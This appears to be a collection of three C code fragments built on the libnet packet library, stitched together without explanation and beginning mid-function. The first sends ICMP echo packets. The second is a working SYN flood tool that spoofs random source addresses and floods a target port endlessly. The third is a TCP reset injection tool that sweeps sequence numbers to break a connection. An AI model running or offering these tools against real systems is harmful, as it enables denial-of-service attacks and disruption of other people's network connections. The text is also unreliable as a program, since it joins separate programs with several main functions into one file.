u_int32_t ip_addr;
u_int16_t id, seq;
int i;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating a random id */
libnet_seed_prand(l);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* Getting destination IP address */
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if ( ip_addr == -1 ) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing 4 packets */
seq = 1;
for ( i = 0; i < 4; i++ ) {
/* Building the ICMP header */
if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
(seq + i), NULL, 0, l, 0) == -1 ) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building the IP header */
if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\
ip_addr, l) == -1 ) {
fprintf(stderr, "Error building IP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
if ( libnet_write(l) == -1 )
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
/* Clearing the packet */
/* Comment this to see what happens when you rebuild headers
* without calling libnet_clear_packet() */
libnet_clear_packet(l);
/* Waiting 1 second between each packet */
sleep(1);
}
libnet_destroy(l);
return 0;
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // allocate memory for packet
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
packet); // packet header memory
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // urgent pointer
NULL, // payload (none)
0, // payload length
packet + LIBNET_IP_H); // packet header memory
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // inject packet
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy_packet(&packet); // free packet memory
if (libnet_close_raw_sock(network) == -1) // close the network interface
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int
main(int argc, char **argv)
{
int c, build_ip, opt, win = 1000, timeout = 10000;
unsigned short src_port = 0, dst_port = 0;
unsigned long src_ip = 0, dst_ip = 0, seq = 0;
libnet_t *l;
libnet_ptag_t tcp, ip;
struct libnet_stats stat;
char errbuf[LIBNET_ERRBUF_SIZE];
memset(&stat, 0, sizeof(stat));
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "Libnet_init error: %s\n", errbuf);
exit(-1);
}
while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1)
switch (opt) {
case 's':
src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'd':
dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'p':
src_port = atoi(optarg);
break;
case 'q':
dst_port = atoi(optarg);
break;
case 'n':
seq = strtoul(optarg, NULL, 0);
break;
case 'w':
win = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'h':
case '?':
usage(argv[0]);
}
if (optind < argc)
usage(argv[0]);
if (!src_ip || !dst_ip || !src_port || !dst_port)
usage(argv[0]);
if (!seq) {
libnet_seed_prand(l);
seq = libnet_get_prand(LIBNET_PRu32);
}
for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) {
tcp = libnet_build_tcp(
src_port, /* source port */
dst_port, /* destination port */
seq, /* sequence number */
0, /* acknowledgement num */
TH_RST, /* control flags */
31337, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l));
goto bad;
}
if (build_ip) {
build_ip = 0;
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
666, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l));
goto bad;
}
}
if ((c = libnet_write(l)) == -1) {
fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l));
goto bad;
}
usleep(timeout);
}
libnet_stats(l, &stat);
fprintf(stderr, "Packets sent: %d (%d bytes)\n"
"Packet errors: %d\n",
stat.packets_sent, stat.bytes_written, stat.packet_errors);
libnet_destroy(l);
exit(0);
bad:
libnet_destroy(l);
exit(-1);
}
